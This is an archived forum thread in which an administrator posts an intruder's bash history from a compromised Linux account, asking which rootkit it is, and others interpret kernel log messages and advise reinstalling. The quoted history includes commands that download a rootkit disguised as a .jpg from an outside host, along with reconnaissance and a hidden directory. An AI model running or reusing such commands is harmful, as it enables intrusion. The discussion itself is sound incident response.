What rootkit is this? sockd/ gpm imaps2 - Security

This is a discussion on What rootkit is this? sockd/ gpm imaps2 - Security ; Anybody recognize those filenames? I found those in a compromised account. I just discovered this, and blocked access to the account... FWIW, I got a nice trace of the activity in .bash_history: wget www.telnet22.com/roxy.jpg tar xvfz roxy.jpg cd sockd bash ...

+ Reply to Thread
Results 1 to 5 of 5

Thread: What rootkit is this? sockd/ gpm imaps2

  1. What rootkit is this? sockd/ gpm imaps2

    Anybody recognize those filenames? I found those in a compromised
    account.

    I just discovered this, and blocked access to the account... FWIW, I
    got a nice trace of the activity in .bash_history:

    wget www.telnet22.com/roxy.jpg
    tar xvfz roxy.jpg
    cd sockd
    bash
    w
    uname -a
    cat /etc/hosts
    ls -la
    cd public_html/
    id
    lsw -la
    ls -la
    touch index.html
    ls -la
    cd .directory
    ls -la
    cd ..
    ls -la
    exit
    mkdir " "
    cd " "
    vi sendeb.pl
    wget www.telnet22.com/s/msg.txt
    vi users
    perl sendeb.pl
    exit


    I've sent this to Bluehost, where telnet22.com is hosted. I found this
    bad looking klogd message... can anybody interpret it for me?

    Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change
    ----------
    Sep 22 13:15:08 neptune kernel: Inspecting
    /boot/System.map-2.6.5-7.257-default
    Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from
    /boot/System.map-2.6.5-7.257-default.
    Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel
    modules not enabled.

    I'd appreciate it --- thanks.


  2. Re: What rootkit is this? sockd/ gpm imaps2

    On 25 Sep 2006 00:06:56 -0700, "robb@acm.org" wrote:

    >/boot/System.map-2.6.5-7.257-default.


    Serves you right for running a 2 1/2 year old system.

    Grant.
    --
    http://bugsplatter.mine.nu/

  3. Re: What rootkit is this? sockd/ gpm imaps2

    robb@acm.org wrote:
    > Anybody recognize those filenames? I found those in a compromised
    > account.
    >
    > I just discovered this, and blocked access to the account... FWIW, I
    > got a nice trace of the activity in .bash_history:
    >
    > wget www.telnet22.com/roxy.jpg
    > tar xvfz roxy.jpg
    > cd sockd
    > bash
    > w
    > uname -a
    > cat /etc/hosts
    > ls -la
    > cd public_html/
    > id
    > lsw -la
    > ls -la
    > touch index.html
    > ls -la
    > cd .directory
    > ls -la
    > cd ..
    > ls -la
    > exit
    > mkdir " "
    > cd " "
    > vi sendeb.pl
    > wget www.telnet22.com/s/msg.txt
    > vi users
    > perl sendeb.pl
    > exit
    >
    >
    > I've sent this to Bluehost, where telnet22.com is hosted. I found this
    > bad looking klogd message... can anybody interpret it for me?


    telnet22.com appears to be shut down as a server, so it's worth giving
    the hosting service kudos for taking action.

    > Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change
    > ----------
    > Sep 22 13:15:08 neptune kernel: Inspecting
    > /boot/System.map-2.6.5-7.257-default
    > Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from
    > /boot/System.map-2.6.5-7.257-default.
    > Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    > Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel
    > modules not enabled.


    Running klogd as root with the -i or -I switch causes the kernel to
    reload its symbols. "man klogd" for more info. It's proof that someone
    was root.

  4. Re: What rootkit is this? sockd/ gpm imaps2

    Allen Kistler wrote:

    > Running klogd as root with the -i or -I switch causes the kernel to
    > reload its symbols. "man klogd" for more info. It's proof that someone
    > was root.


    Interesting - thanks. Actually, I just realized that there was one
    message before these that's relevant - wrt. "gpm":

    Sep 22 13:15:07 neptune kernel: process `gpm' is using obsolete
    setsockopt SO_BSDCOMPAT
    Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change
    ----------
    Sep 22 13:15:08 neptune kernel: Inspecting
    /boot/System.map-2.6.5-7.257-default
    Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from
    /boot/System.map-2.6.5-7.257-default.
    Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel
    modules not enabled.


    When I realized someone had been using this account, ps showed a "gpm"
    process running as this user. I killed the process, and I've found the
    complete executable and rootkit in the user directory. I'm sure it's
    not really gpm. :-)

    So it looks like this executable caused the symbol table to be re-read?
    Does this change the diagnosis? Is it possible that the hacker did
    *not* have root privs; they simply started this executable, which made
    some system call - which doesn't seem to have been successful in
    loading new modules. (?)


  5. Re: What rootkit is this? sockd/ gpm imaps2

    robb@acm.org wrote:
    > Allen Kistler wrote:
    >
    >> Running klogd as root with the -i or -I switch causes the kernel to
    >> reload its symbols. "man klogd" for more info. It's proof that someone
    >> was root.

    >
    > Interesting - thanks. Actually, I just realized that there was one
    > message before these that's relevant - wrt. "gpm":
    >
    > Sep 22 13:15:07 neptune kernel: process `gpm' is using obsolete
    > setsockopt SO_BSDCOMPAT
    > Sep 22 13:15:07 neptune kernel: klogd 1.4.1, ---------- state change
    > ----------
    > Sep 22 13:15:08 neptune kernel: Inspecting
    > /boot/System.map-2.6.5-7.257-default
    > Sep 22 13:15:08 neptune kernel: Loaded 24842 symbols from
    > /boot/System.map-2.6.5-7.257-default.
    > Sep 22 13:15:08 neptune kernel: Symbols match kernel version 2.6.5.
    > Sep 22 13:15:08 neptune kernel: No module symbols loaded - kernel
    > modules not enabled.
    >
    >
    > When I realized someone had been using this account, ps showed a "gpm"
    > process running as this user. I killed the process, and I've found the
    > complete executable and rootkit in the user directory. I'm sure it's
    > not really gpm. :-)
    >
    > So it looks like this executable caused the symbol table to be re-read?
    > Does this change the diagnosis? Is it possible that the hacker did
    > *not* have root privs; they simply started this executable, which made
    > some system call - which doesn't seem to have been successful in
    > loading new modules. (?)


    It's a lot more likely the kit executed a local privilege escalation and
    replaced at least pieces of the kernel. Unless you want to donate the
    server to science or law enforcement for a forensic investigation,
    isolate the machine, back up the data, wipe it all, and reinstall.

+ Reply to Thread